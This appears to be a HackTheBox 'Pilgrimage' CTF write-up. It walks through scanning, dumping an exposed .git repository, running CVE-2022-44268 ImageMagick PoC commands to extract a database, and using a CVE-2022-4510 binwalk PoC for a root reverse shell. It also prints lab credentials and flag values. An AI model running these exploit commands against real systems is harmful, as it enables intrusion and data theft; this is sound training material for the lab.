Skip to main content

HTB - Pilgrimage

· 8 min read
Strider

Intro

Hi, after some time, I write again a small WriteUp. Today it's about the CTF "Pilgrimage". This CTF-Challenge can be found at the platform HackTheBox. You have to find 2 flags in this challenge.

Discovery

First of all I fire up nmap and run a port scan. And as you can see here nmap discovers 2 opened ports.

Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-16 11:25 CEST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 11:25
Completed Parallel DNS resolution of 1 host. at 11:25, 0.00s elapsed
Initiating SYN Stealth Scan at 11:25
Scanning 10.129.71.227 [65535 ports]
Discovered open port 80/tcp on 10.129.71.227
Discovered open port 22/tcp on 10.129.71.227
SYN Stealth Scan Timing: About 23.78% done; ETC: 11:27 (0:01:39 remaining)
SYN Stealth Scan Timing: About 57.98% done; ETC: 11:28 (0:01:23 remaining)
SYN Stealth Scan Timing: About 68.69% done; ETC: 11:28 (0:01:06 remaining)
SYN Stealth Scan Timing: About 82.16% done; ETC: 11:28 (0:00:38 remaining)
Completed SYN Stealth Scan at 11:29, 224.37s elapsed (65535 total ports)
Initiating Service scan at 11:29
Scanning 2 services on 10.129.71.227
Completed Service scan at 11:29, 6.42s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.129.71.227
Initiating Traceroute at 11:29
Completed Traceroute at 11:29, 0.21s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:29
Completed Parallel DNS resolution of 2 hosts. at 11:29, 0.20s elapsed
NSE: Script scanning 10.129.71.227.
Initiating NSE at 11:29
Completed NSE at 11:29, 3.66s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.82s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Nmap scan report for 10.129.71.227
Host is up (0.12s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
| 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
|_ 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0
Uptime guess: 38.680 days (since Thu Sep 7 19:09:43 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 208.94 ms 10.10.14.1
2 208.75 ms 10.129.71.227

NSE: Script Post-scanning.
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Initiating NSE at 11:29
Completed NSE at 11:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 238.05 seconds
Raw packets sent: 69272 (3.050MB) | Rcvd: 69657 (2.984MB)

The ports nmap discovers are port 22 which is ssh, what I leave as it is for now. The second is port 80 which is an http server (nginx) which is interesting for now. Therefore I have to look for the web application running on port 80.

Another interesting information I got, is the redirect to http://pilgrimage.htb/ on port 80. Well, I added an host entry for that domain and the corrosponding ip address into the file /etc/hosts.

dia1.png

The web application offers an file upload for images to shrink them. That sound for me that I've to do some file upload exploitation? I fire up burpsuite to test the Fileupload and let run nikto at the same time.

While testing the file upload with burpsuite I got the results from nikto, which sounds for me very interesting because there is an .git folder in the web root directory?

- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.129.71.227
+ Target Hostname: pilgrimage.htb
+ Target Port: 80
+ Start Time: 2023-10-16 11:38:33 (GMT2)
---------------------------------------------------------------------------
+ Server: nginx/1.18.0
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /: Cookie PHPSESSID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /login.php: Admin login page/section found.
+ /.git/index: Git Index file may contain directory listing information.
+ /.git/HEAD: Git HEAD file found. Full repo details may be present.
+ /.git/config: Git config file found. Infos about repo details may be present.
+ /#wp-config.php#: #wp-config.php# file found. This file contains the credentials.
+ 7962 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-10-16 11:45:16 (GMT2) (403 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Initial access

The first what I tried is to call the listed files of the .git directory with curl. And yes its a real git repository hosted on that server.

dia2.png

The next what I tried is to download the while .git directory with the wget tool.

wget -r --no-parent http://pilgrimage.htb/.git/

But this doesn't work, I got 403 forbidden. I also tested if I can download specific files from that directory, and yes it works.

dia3.png

After some googleing I found a tool called git-dumper. With this tool it could be possible to download the entire directory.

dia4.png

That look pretty good, may I can find some credentials or some vulnerabilies in the source of that application.

But for now, I made a break, and continue it Later

dia5.png

Well, the git commit history shows me that only commit was made. in the folder source where I Downloaded the whole git, I have the sources files where I can start analyzing.

dia6.png

By analyzing the source file index.php I found 2 interesting things, the first one is the sqlite database sqlite:/var/db/pilgrimage, and the second thing the exec function which executes the file magick. Well, magick is an program to convert image files, and on the first glance, it looks somehow like a command injection vulnerability.

./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)

After some research for magick 7.1.0-49, I stumbled over the CVE-2022-44268 (ImageMagick 7.1.0-49 - Arbitrary File Read). That sounds very good for me. This vulnerability could be useful to dump the database. I decided to use this PoC-Exploit to get the database.

python3 CVE-2022-44268.py --image ../test.jpg --file-to-read /var/db/pilgrimage --output poisoned.jpg

I uploaded this generated image file to dump the database. dia7.png dia8.png

The next what I have to is to run this exploit script against the generated url from the upload page. Unfortunately it not worked very well.

dia9.png

I analyzed the exploit code and commented out the the decoder line and replaced the print call.

dia10.png

Now it's time to run it again and I hope that it works properly.

dia11.png

Well, it look good, time to dump it in a file and decoded as raw sqlite file. To archeive this i crafted this command to dump the database then decode it to an raw format and then write the raw into the test.db file.

python3 CVE-2022-44268.py --url http://pilgrimage.htb/shrunk/652d0c760e47c.png | xxd -r -p - > ../test.db 

dia12.png

Well it works and I can try to read all credentials stored into the users table.

dia13.png

emily|abigchonkyboi123

I tested quickly these credentials on ssh may I get access. Yes, it worked, I'm now connected with ssh and have a shell.

dia14.png

Here your go! Here is the first flag.

user.txt: 4db5e8f1234f11678197e8dbbf176dbe

Get root

dia15.png While enumerating potential attack vectors for priviliege escalation, i stumbed in the process list ofer the malicous script /usr/bin/malwarescan.sh dia16.png I analyzed the source and my attention went over to binwalk. dia17.png I searched for binwalk v2.3.2 if there any vulnerabilities which I should exploit to gain root access, and yes there is an vulnerability, CVE-2022-4510. dia18.png To exploit this vulnerability I used an PoC and generated an exploit image which spawns a reverse shell to my local machine. dia19.png The only thing what I have to if I understand it correctly is to upload the image file and switch over to the netcat listener. dia20.png The netcat listener received the shell and I'm root, noice! Grab the root flag which completes this challenge.

root.txt: 639e2c725229eebabac8c01dc5da6ab2

This challenge was funny and it was a easy machine 😄

I hope you enjoyed it and see you next time 😄